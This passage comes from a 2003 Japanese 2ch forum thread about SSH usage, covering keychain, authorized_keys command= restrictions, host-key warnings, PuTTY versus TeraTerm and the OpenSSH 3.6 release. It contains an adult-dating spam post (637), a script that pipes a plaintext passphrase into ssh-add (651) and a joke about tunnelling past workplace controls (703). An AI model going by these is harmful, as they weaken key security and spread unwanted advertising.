617 名前:名無しさん@XEmacs メール:sage 投稿日:03/01/24 10:07
>>613
> keychainの--clearオプションの使い方がいまいち分かりません。

過去スレ (http://pc.2ch.net/unix/kako/976/976497035.html) の
693 においらの理解は書いといたけど、あんな程度のもんじゃなかろ
か。

だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
マシだと思う。


618 名前:613 メール:sage 投稿日:03/01/25 10:19
過去スレを読むのを怠っていました。どうもすいません。

--clearの効用、よく理解できました。
使い方が分からず、何時間か悩んでいたんですが、いざ分かってみると、
かなり拍子抜けしました。
# もっと「すごい」機能を想像していたんですが。

> だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
> マシだと思う。

そのようですね。こちらの方法で試してみたいと思います。


619 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/27 00:03
ssh -o monster

620 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/28 04:46
WinSCP 2.2、βが取れたみたいだから入れてみたけど、めっちゃ重いね。

621 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/28 23:23
素直にsftp使うよろし

622 名前:  投稿日:03/01/31 23:22
tera termは偉大なり。
だれか、TTSSHに代わるものつくってちょ!

623 名前:名無しさん@お腹いっぱい。 投稿日:03/02/01 00:44
>>622

PuTTY じゃなんでダメなの?

624 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 00:46
putty っていやらしくない?
tty ですでにいやらしいけど。

625 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 01:17
いやらしくないのがいいんですか?

626 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 02:58
パテのどこがいやらいいんだ?

627 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 03:40
ぷっちぃ


628 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 09:46
ピア=マルコ




なつかすぃ〜(藁

629 名前:622 投稿日:03/02/01 10:40
TeraTerm のマクロが結構あんのよ

630 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 11:35
TeraTermでローカルのCygWin/sshdにログイン。
そっから好きなとこいけ。

631 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 13:37
>>630
ローカルへ、のときにssh使う意義って何?

632 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/01 14:16
自動化が楽。

633 名前:名無しさん@お腹いっぱい。 投稿日:03/02/01 20:09
てらりん☆あげ

634 名前:名無しさん@お腹いっぱい。 投稿日:03/02/20 14:40
ホストが3つあって
ローカルホストAにはAで生成した秘密鍵が。
リモートホストBにはAの公開鍵とBで生成した秘密鍵が。
リモートホストCにはBの公開鍵が置いてあるがAの公開鍵はない。
Aの秘密鍵とBの秘密鍵のパスフレーズは同じ。

こういうときにパスフレーズを一回しか打たずにCに入る方法(あるいはソフト)ってありますか?
rootナシで動くソフトならBにインストールしておけるという条件で。

もしよい方法がありましたら教えてください。お願いします。

635 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/20 15:00
あるわけないでしょ。鍵が違うんだから。

636 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/20 15:33
>>634
2段階のログインがいやなら
ssh B ssh C
でどうよ。
パスフレーズは2回打たなきゃいけないけど
コマンド1つで済む。
試してないけど。

637 名前:590 投稿日:03/02/20 16:24
■■わりきり学園■■

コギャルから熟女まで

素敵な出会い

ゲイ、レズビアンなどコンテンツ豊富

http://www.geocities.jp/kgy919/deai.html









638 名前:634 投稿日:03/02/20 21:40
うーむ。ダメですか。
エージェントみたいなのにパスフレーズを記憶させて、
パスフレーズの入力時に勝手に送信してくれるようなソフトはないですかね。
空パスフレーズよりは少し堅いかと思ったのですが。

>>636
ssh -t B ssh C
ならできました。けど、やはりこれを省略したい……。

639 名前:名無しさん@Emacs メール:sage 投稿日:03/02/20 23:42
>>634
ホストCにAの公開鍵をおけば?

640 名前:名無しさん@Emacs 投稿日:03/02/21 18:30
>>634
>>639
ほんで、エージェントフォワードを認めればよい

641 名前:634 投稿日:03/02/21 21:13
>>639,640
いや、エージェントフォワードもポートフォワードもしない方法を探していたんですよ。
まぁ、なさそうなので諦めます。

642 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/02/21 21:18
>634
パスフレーズ無しの鍵を利用する

上5行とは矛盾しないが、

643 名前:名無しさん@お復いっぱい。 メール:sage 投稿日:03/02/24 11:53
>>634
ホストB の ~/.ssh/authorized_keys に
no-X11-forwarding,no-agent-forwarding,command="/path/ssh ホストC" ホストAの公開鍵
って書けば。
ホストA で,
ssh ホストB
とすると自動的に(ry

644 名前:名無しさん@お復いっぱい。 メール:sage 投稿日:03/02/24 11:55
追加。
そういや no-port-forwarding オプションもあった。

645 名前:名無しさん@お腹いっぱい。 投稿日:03/03/06 12:50
RHL8.0 入れたら RHN7.3 からの slogin がエラーが出て繋がらなくなりますた
サーバで素で入れたまんま。ファイアーウォールはお互い張っていません。

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:3
RSA host key for 192.168.160.251 has changed and you have requested strict check
ing.
Host key verification failed.


646 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 12:56
見たとおり、相手方のサーバ鍵が変わっている、成りすましの可能性もあるから
確認せよってこった。

647 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 12:56
>>645
正常な動作だと思いますが。


648 名前:645 メール:sage 投稿日:03/03/06 13:30
するとサーバ鍵を再生成すれば良いんでしょうか・・・?
ってか初めての接続で怒られてる・・・あ、再インストで同IP使ってる・・・
それが原因でしょうか。ってことは認証をもう一回張り直せばOK?

649 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 13:34
つーか、ssh の動作をぜんぜんわかってないみたい。
telnet でも使えば?

650 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 13:38
>>648
黙って英文読めって。
読めなかったら、その英文の一部をぐぐれ。

651 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 16:28
>>634
ホストAとホストBのsshがSSH Secure Shellなら、パスフレーズがある場合でも

eval `ssh-agent`
echo PASSPHRASE | ssh-add -p
ssh -t B "eval \`ssh-agent\`;echo PASSPHRASE | ssh-add -p;ssh C"

みたいなのをスクリプトに書いてPASSPHRASEの部分を一度だけ入力させるようにすれば、実現できる。

OpenSSHだとssh-addに-pオプションはないみたいですが、
どうしてないんでしょう? 危険なんでしょうか? >詳しい方々

652 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 22:41
>648
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか? @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

653 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 23:02
I have something wrong with >>652.
I just executed it, but it does't work well.
What should I do?

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか? @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



654 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 23:09
呪われた虐 (ry

655 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/06 23:24
警告: リモートホストの同一証明は変わった!
誰かが厄介な何かをしていることは可能である!
誰かはあなたで今盗み聞きできる( 人中間の攻撃)!
RSA のホストのキーがちょうど変わったことは可能またである。
RSA のための指紋はリモートホストによって送られてである
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31
調整する。あなたのシステム管理責任者に連絡しなさい。
このメッセージを取り払うために正しいホストのキーのの
/ root/.ssh/known_hosts 加えなさい。
192.168.160.251 のためのおこる主で
/ root/.ssh/known_hosts:3
RSA ホストのキーは変わり, あなたは厳密な点検を要求した。
ホストの主証明は失敗した

http://babelfish.altavista.com/

656 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/07 05:28
みんなやさしいね。

657 名前:名無しさん@XEmacs メール:sage 投稿日:03/03/07 13:20
>>651
> OpenSSHだとssh-addに-pオプションはないみたいですが、
> どうしてないんでしょう? 危険なんでしょうか?

まぁ、$SH のやつが実装しているというなら、直接的なセキュリティ
ホールってことはないんでしょうが。気になるとすれば、こういう機
能を付けてしまうと passphrase を直にベタ書きした script の類が
書きやすくなってしまうかも、って程度かしら。

-p なしでも、expect とか使えば似たよなことはできちゃうので必要
を認めずってことかもしれないし。


658 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/07 13:56
>>648
コンサル(ry

スレ違いsage

659 名前:名無しさん@お腹いっぱい。 投稿日:03/03/11 11:05
-fでバックグランドジョブを投入すると標準入出力が/dev/nullにリダイレクトされてしまうけど、
これを避ける方法はありますか?

やりたいこと:
マシンB,C間でsshで接続したバックグランドジョブを動かしたい。
ssh-agentはマシンAで動かし、マシンAからsshでマシンBにコマンド(B,C間のsshジョブ)を投入する。
マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

660 名前:名無しさん@お腹いっぱい。 投稿日:03/03/11 22:52
すみません、ちょっと挫折しかけてるので質問します。
host-A:25----host-B:25----host-C:25
というふうに2重にssh-portfowardingして実質的に
host-A:25----host-C:25
にするにはどのようにすればいいのでしょう?
host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
command="ssh host-C"とか書いて、host-A(windows)のPortforwarderで
チャレンジしましたけどhost-Cまでたどり着けませんでした。
もちろんhost-Aからhost-B、host-Bからhost-Cにsshが通るのは確認済みです。
sshの偉い方、よろしくお願いします。

661 名前:名無しさん@お腹いっぱい。 投稿日:03/03/12 03:12
そろそろTeraTermがSSH2に対応しそうです。

662 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/12 18:44
>>661
これのこと?
http://www.ayera.com/teraterm/


663 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/12 19:15
SSH2使いたい人はとうの昔にPuTTYに乗り換えたからなぁ。
とはいえ、端末エミュレータとしてはTeraTermのほうが安定性とか
日本語まわりとかで優れている点も多いんで、いまさら無意味という
わけではないけど。

664 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/12 19:32
ぐぐってみると、TTSSH2 なんてのを作ってる方がいたみたいだけど、
今はどんな感じなんでしょ?
>>661 さんの言ってるのはそれのことなのかしら?

665 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/12 20:51
>663
> 端末エミュレータとしてはTeraTermのほうが安定性とか
> 日本語まわりとかで優れている点も多いんで

そうか?
putty の方が多機能だし日本語処理も「正しく」やっているし (iso-2022 patch の話だが)
マクロはまた別だが

666 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 00:05
putty ってシリアル端末として使えたっけ?
TeraTerm は ZMODEM over SSH でファイル転送なんて技もできるし。

667 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 00:17
PuTTY: A Free Win32 Telnet/SSH Client
http://pc.2ch.net/test/read.cgi/unix/1014702733/

くらいあんとのはなしわ

668 名前:名無しさん@お腹いっぱい。 投稿日:03/03/13 04:29
>>661に繋がらないのだが、俺だけ?
直接SSH2を喋れるTeraTermほすぃんだけど...。


669 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 04:30
間違えた。>>662でつ。



670 名前:i@am@z 投稿日:03/03/13 05:02
おい、それから言葉使いなんとかしろよ、ハッカー気取りのホウケイ!
初心者の皆さん、(っても僕も6荷月児ですが)上のような馬鹿には気を
つけましょう。この手はいっぱいいます。外人さんの方がいい人多いですよ。

671 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:03/03/13 05:04
教えてくれ。

672 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:03/03/13 05:09
質問。
外のマシンにopensshのデーモンをtcpwrapperオプションつきであげてるんだけど、
inetdのhost.allowを動的にコントロールする方法ないかなぁ?
YahooBBなんでsshd: .bbetc.net、つーのもちょっと怖いんで、DDNSみたいな感じで
別んとこからコントロールできたらな、と。(それも怖いけど)

時に2ch対策でYahooBBが希望者の逆引きをybb.ne.jpかなんかにするって話あったよね?
あれの申し込みはどうやるの?


673 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 05:37
>>672
> inetdのhost.allowを
意味分からん。

つーか、何をキーというかトリガーにしてコントロールしたいん?

漏れなら、SSH なんだからきっと大丈夫やろ、と思ってどっからでも許可にしちゃうが。

674 名前:672の母です メール:sage 投稿日:03/03/13 07:31
この度は息子がわかりづらい質問をして申し訳ありません。
恐らく息子はこう言いたかったのだと思います。

質問があります。

レンタルサーバ上で sshd を inetd 経由で立ち上げるようにしています。

自宅のISPは YahooBB です。自宅のPCのIPアドレスが変わったときに
それを検知して何らかの方法でレンタルサーバ上の /etc/hosts.allow を
書き換えたいと思っています。何かいい方法はないでしょうか?

 sshd: .bbbetc.net

としておくのはちょっと怖い気がします。

以下は略します。

ところで私自身は tcpserver なのですが、同様なことを考えたことがあります。
私の場合はcronで自分(自宅サーバ)のIPアドレスをチェックし、変わっていたら
sshdサーバ宛にメールを送信し、その発信元アドレスを接続制御データベースファイルに
書き出すようにしていました。

ただ自宅サーバをルータ兼用にしていたときは上記でよかったのですが、
ブロードバンドルータを導入したため、自宅サーバからWAN側のアドレスを
調べることができなくなってしまいました。

私のような場合はどうしたらよいのでしょうね?

至らない親子で申し訳ありませんが、何卒よろしくお願いします。

675 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 07:48
>>674
どこからでもつながるsshdは怖がるのに、IPアドレスをメールで送るのは
平気というのはどういうことかと思います。PGPでも使っていたんですか。

- メールを信じるのであればReceived:ヘッダかメールログを解析して
接続元のグローバルIPアドレスを取得すればいいと思います。でも
この方法だと通信路を盗聴できる第3者にメールをまるごとキャプチャ
されて、その時と同じIPアドレスを取られたときに無意味になりますね。

- 最近のルータはWebインタフェイスがついていると思うので、
CurlみたいなHTTPクライアントを使ってbasic認証を喋らせて
取得IPアドレスを読むようなスクリプトでも組めばいいと思うです。

676 名前:672の母です メール:sage 投稿日:03/03/13 08:11
>>675
ちょっとだけ補足しておきますと、
SMTP over SSL でつないでおりました。
本文などにはIPアドレス自体は記述しておりませんでした。
Received を解析するのはさすがに採用しかねますね。

ルータのWebインタフェースも利用できればいいのですが
内側からしかアクセスできないのです。

677 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 10:25
publickey 認証のみ許可すればいいだけでわ?

678 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 14:22
んだな。それに passwd 認証にしても、
ホスト鍵の指紋をつねに紙に書いて覚えておけばいいだけ。

679 名前:山崎渉 メール:(^^) 投稿日:03/03/13 16:27
(^^)

680 名前:672の母の息子でです メール:age 投稿日:03/03/13 19:35
翻訳してくれてさんきゅ♪さすがかあちゃん。

>675
それだと

681 名前:672の母の息子でです メール:age 投稿日:03/03/13 19:38
間違い。
>675
かあちゃんのゆーとおりレンタルサーバなのでルータは制御できません。

>678
それってどういうこと?

682 名前:うひひ メール:sage 投稿日:03/03/13 20:01
>>681
自宅のIPをDDNSに喰わしてその名前を使ったらドーなの?


683 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/13 22:14
門前払いしなければいけない理由はなんだ?

sshdのセキュリティホールが心配。とか?

684 名前:675 メール:sage 投稿日:03/03/13 22:15
>>676
| ルータのWebインタフェースも利用できればいいのですが
| 内側からしかアクセスできないのです。

webインタフェイスにアクセスするのはルータの内側のマシン上にある
スクリプトで、そいつがサーバにメールを送るのでいいんでは?
PPTPとかIPSEC(racoon, isakmpd)とかを併用するのではだめなんですか?

685 名前:672の母 メール:sage 投稿日:03/03/14 14:31
>>683
あ、ごめんよ。母は別に sshd だけじゃないのよ。息子はどうか知らんけど。
つーわけで ssh の話じゃないので吊ってくるわ。お先に!>息子

686 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/15 09:11
(´-`).。oO(そのうち「>>672の精子です」とかいうやつも出てくんじゃないかな)

687 名前:名無しさん@お腹いっぱい。 投稿日:03/03/16 17:59
sftpって転送モードの指定ができないんだけど
実際は何モードで転送されてるの?
バイナリモード?

688 名前:名無しさん@お腹いっぱい。 投稿日:03/03/16 18:35
sftp という名前がついているが、実際は scp のラッパーみたいなもの。

689 名前:名無しさん@お腹いっぱい。 投稿日:03/03/17 20:08
openSSHをインストールしようと思っているのですが、
スタンドアロン+TCP Wrappersがいいのか、xinetdから起動か、
どっちがいいのでしょうか?

690 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/17 22:45
> sftp という名前がついているが、実際は scp のラッパーみたいなもの。

ssh のラッパーだよ。

691 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/17 23:15
>689
tcpserver から起動

>690
> ssh のラッパーだよ。
ssh のモジュールだよ。

692 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/17 23:32
>>689
前者

693 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/18 12:08
>>634 keychain と .ファイル
てか、keychain 使っている人いない?


694 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/18 12:30
>>693
使ってますが、何か?


695 名前:693 メール:sage 投稿日:03/03/18 13:35
>694
ごめん。このスレにでてなかったんで... 前のスレで語り尽くされていたのね。
激しく便利。


696 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/18 23:04
利便性は安全性の犠牲の上に成り立っている

697 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/18 23:19
ところでSSH Secure Shellのssh-keygenに
-pってオプションがあってパスフレーズを引数で入力できるんですが
これって他人にps axとかされると危険じゃないんでしょうか?

ssh-keygenを使うのは最初だけだから多分大丈夫ってことなんですかね?


698 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/18 23:50
>>697
漏れ、ちょうど今こんなスクリプト書いてたところだったよ。

system("ssh-keygen -t #{type} -N '' -f #{file}")

パスフレーズが空だから良いけど、ちゃんとした文字列入れるのはコワイね。

699 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/19 00:42
>697
利便性は安全性の犠牲の上に成り立っている

どうでもよいが、
> SSH Secure Shell
を見て、頭痛が痛くなった

700 名前:名無しさん@お腹いっぱい。 投稿日:03/03/19 00:55
Terminal Emulator <Guevara>
http://www.routrek.co.jp/product/guevara.html


701 名前:初期不良 メール:sage 投稿日:03/03/19 01:36
>>700
イイかも
使ってみまつ

702 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/19 02:16
>>699
SSH Secure Shell for Workstations
http://www.ssh.com/products/security/secureshellwks/


703 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:03/03/19 09:32
>>700
ためしにダウソしてみました。
感想
 起動が重いうえに、Port Forwardingはできないようだ。 これは致命的。
トンネルが掘れないと、会社でコソーリ ネットができないじゃないか(藁

704 名前:bloom 投稿日:03/03/19 10:09
http://www.agemasukudasai.com/bloom/

705 名前:名無しさん@XEmacs メール:sage 投稿日:03/03/19 17:00
>>659
> マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
> を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
> 今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

なんか普通にできるんだが。

augustus[259]$ ssh -f caesar "nohup ssh caligula sleep 30 &"
augustus[260]$ ssh caligula ps x | egrep sleep
25475 ?? Is 0:00.01 sleep 30
augustus[261]$

環境の違い?

706 名前:名無しさん@XEmacs メール:sage 投稿日:03/03/19 17:14
>>660
> host-A:25----host-B:25----host-C:25
> というふうに2重にssh-portfowardingして実質的に
> host-A:25----host-C:25
> にするにはどのようにすればいいのでしょう?

Portforwarder は持ってないので OpenSSH でしか試してないけど

> host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
> command="ssh host-C"とか書いて、

という方向性でうまく行くよん (もちろん、port forwarding option
の記述が double quotation の中になきゃダメだけど)。

あらかじめ host-B→Host-C の port forwarding を設立しとく方が簡
単だとは思うけど。

> host-A(windows)のPortforwarderで
> チャレンジしましたけどhost-Cまでたどり着けませんでした。

具体的にどうチャレンジしたん?ほんとに上の通りの設定だとしたら、
host-B のユーザが root じゃなきゃ port を開けないわけだが。


707 名前:へのへのもへじ 投稿日:03/03/20 21:00
CHROOTされた環境でのWINSCPの使用について教えてください。
http://mail.incredimail.com/howto/openssh/
↑このページを参考にしてOpenssh3.5を入れてみたんですけど、
winscpがうまく使えませんでした。chrootして接続できるの
ですが、実際にファイルのコピーができないのです。
OSはRedHat7.2,7.3両方で試したのですが、、、。
何か方法ご存知の方いらっしゃいますか?

708 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/22 22:36
不安定な回線から使ってて、回線が切れてもセッション維持する事って出来ませんか

709 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/22 22:50
>>708 screen

710 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/22 22:54
>>709
調べてみます。
どもありがと

711 名前:参考までに メール:sage 投稿日:03/03/23 16:45
>>708>>710
GNU screen その2
http://pc.2ch.net/test/read.cgi/unix/1048030339/l50
の1にあるリンク先とか

# というか、全然SSHとか関係ない罠(w

712 名前:名無しさん@XEmacs メール:sage 投稿日:03/03/23 17:40
>>707
> 何か方法ご存知の方いらっしゃいますか?

とりあえず、WinSCP が吐く log 見てみれば、何か分かるのでは?


713 名前:春山征吾 ◆ok9Ggg6xsM メール:sage 投稿日:03/03/24 00:27
>>707
私はWINSCPを利用したことがないのですが
http://www.sdri.co.jp/rssh/faq.html.ja
に依ればWINSCPは
「コマンドラインの ssh ツールに GUI フロントエンドを提供する小さなハック」
で、
「ユーザが ssh を通してファイルシステムを操作するためのコマンドを実行できることが必要である」
ということです.

714 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 12:06
厨質問でごめん。
sshで接続しているサーバのsslとsshをアップデートする場合
sshdをkillすることになるので作業できなくならない?

715 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 12:16
>>714
SSH ログインした状態で ps -ef | grep sshd してみ。
子プロセスの方を残しておけばセッションは切られない。はず。
もちろん失敗するとログインできなくなるので
local でやった方が無難ではある。

716 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 12:49
> local でやった方が無難
レンタルサーバの人はどーすれば?(w

717 名前:うひひ メール:sage 投稿日:03/03/27 13:01
>>716
>>715の「はず」に期待するかtelnetでも開けておけばいいでしょ


718 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 13:36
httptunnel+sshで接続したDebianサーバ上で /etc/init.d/ssh restart を
実行しても切れなかった。

719 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 13:43
>>716
知らねーよ。
リスクを理解した上でそういう環境使ってるなら
どうすればいいかは自分で考えるべきだろ。

720 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 14:08
>>714
kill することになるのですか本当ですか?

721 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 14:50
漏れはそれが嫌なのでinetdからsshdを上げるようにしている。
最近のCPUは速いから遅くもなんとも感じねー

722 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/27 21:11
>716
ポートずらす

723 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 01:32
>>716
前のバージョンを残しておけばいいんじゃないの?

724 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 04:05
>>723
sshd 落ちた状態で不意に SSH セッション切れちゃったら、
そっから先は一体どうすりゃええねん、っつー話でしょ。

725 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 04:21
だからkillする前に前のバージョンを別のポートで動かしとけばいいんじゃないのかな

726 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 05:22
daemontools から上がるようにしとけば不意に sshd 落ちちゃっても復活する?

727 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 10:32
libcrypto.so の変更にコケたら daemontools を使おうが inetd だろうがコケる。
libcrypto.a なら関係ないけど。


728 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 11:16
オペミスの可能性もあるし。

729 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/28 12:22
>>727
んじゃ、万が一のために static link した sshd のバイナリを作っといて、
作業中には inetd か何かで別ポートで上げとく、これでどうよ?
# って、そんな引っ張るネタでもねえな、そろそろやめときまつ。

730 名前:春山征吾 ◆ok9Ggg6xsM メール:haruyama@unixuser.org 投稿日:03/03/31 23:05
OpenSSH 3.6, 3.6p1 がリリースされました。
変更点の拙訳を
http://www.unixuser.org/%7Eharuyama/security/openssh/henkouten_3.6.txt
に置きました.

731 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/31 23:08
えっ! まだ出とらんぞ。

732 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/03/31 23:24
>>731
出てるけどミラーが行き渡ってないだけでしょ。

733 名前:名無しさん@お腹いっぱい。 投稿日:03/04/01 01:32
>>731
出てるYO! アナウンスメール:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-March/000058.html

>春山san
早いっすね!いつもどうもです m(__)m
ちなみに、前スレはhtml化されてます:
  ssh
  http://pc.2ch.net/unix/kako/976/976497035.html

734 名前:731 メール:sage 投稿日:03/04/01 03:41
本当だ。
どうも

735 名前:名無しさん メール:sage 投稿日:03/04/01 04:14
scpに-1が渡せるのうれしいな。いままで-oProtocol=1してたから。


736 名前:新山 投稿日:03/04/01 10:16
マニュアル翻訳しますた。
間違いがありましたらご指摘いただければ幸いです。
http://www.unixuser.org/%7Eeuske/doc/openssh/jman/index.html

マニュアルを翻訳していて気づいた変更点は、

1. scp: -1, -2, -l (帯域制限) オプション追加
2. sftp: コマンドの前に "-" をつけるとエラーが発生しても終了しない。
3. ssh-add: -c オプション追加 (鍵を使用するときにユーザに確認をとる)
4. ssh-agent: -t (鍵のデフォルト生存時間) オプション追加。でも ssh-add で指定した値のほうが優先される。
5. ssh-keysign を使うには ssh_config で、HostbasedAuthentication のほかに EnableSSHKeysign = yes とする必要がある。

といったところですかね。


737 名前:名無しさん@Emacs メール:sage 投稿日:03/04/01 15:04
>>732
ftp.ayamura.org/pub/openssh がミラー頻度が多い


738 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/01 23:21
頻度は「高い」


739 名前:新山 投稿日:03/04/02 11:01
3.6.1 になったようれす。

なにやら 3.6 に入れたバグフィックスが別のバグになってしまい、
他の SSH と通信が途切れるようになったため、これを防止したとのことです。

CVS Log:
The 'kex guesses' bugfix from OpenSSH 3.6 triggers a bug
in a few other SSH v2 implementations and causes connections to
stall. OpenSSH 3.6.1 disables this bugfix when interoperating
with these implementations.


740 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/03 22:32
>>738
「大きい」だろ

741 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/04 04:09
>>740
738じゃないが、一応
http://dictionary.goo.ne.jp/search.php?MT=%C9%D1%C5%D9&kind=&mode=0&jn.x=17&jn.y=11

742 名前:名無しさん@お腹いっぱい。 投稿日:03/04/09 17:47
OpenSSHを手に入れて,署名も手に入れたんですけど,
肝心の公開鍵がどこにあるのかわかりません。
探し回ったけど見つからないです。
トロイの事件があったので気にしているんですけど,鍵がどこにあるか
教えてくれませんか?


743 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/09 18:41
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/DJM-GPG-KEY.asc

744 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/09 20:21
>742
鍵じゃなくて署名だろ
鍵だったら鍵サーバにあるでそ

745 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/09 20:42
本体が落とせて署名が見つからないってあるかな
鍵サーバで探すとしてなにでサーチするんだろ

746 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/09 22:12
鍵サーバからはメールアドレスで検索できる
ただし、その鍵が信用できるものかどうかの検証、という問題が残るが

747 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/09 22:19
メールアドレスってだれのメールアドレス?

748 名前:初期不良 メール:sage 投稿日:03/04/10 11:59
>>745
署名を確認しようとすると鍵 ID が表示されて
この ID の公開鍵が見つからないと言われたりする。
キーサーバを設定してあれば見つからない公開鍵は
自動的に取得してくれたりもする。
あとはこちらで

PGP / gpg スレ
http://pc.2ch.net/test/read.cgi/unix/1007324740/


749 名前:742 メール:sage 投稿日:03/04/10 16:35
>>743 ありがとうございました

とりあえず検証完了しました。

厳密には,743さんの教えてくれた鍵が正しいかどうか検証が必要ですが,
今回はbsdのサイトにおいてあったし,
opensshのサイトにおいてあった署名が無事検証できたので
とりあえずOKとしました。

このままだと,ただの教えて君なので,検証したメモを残しておきます。
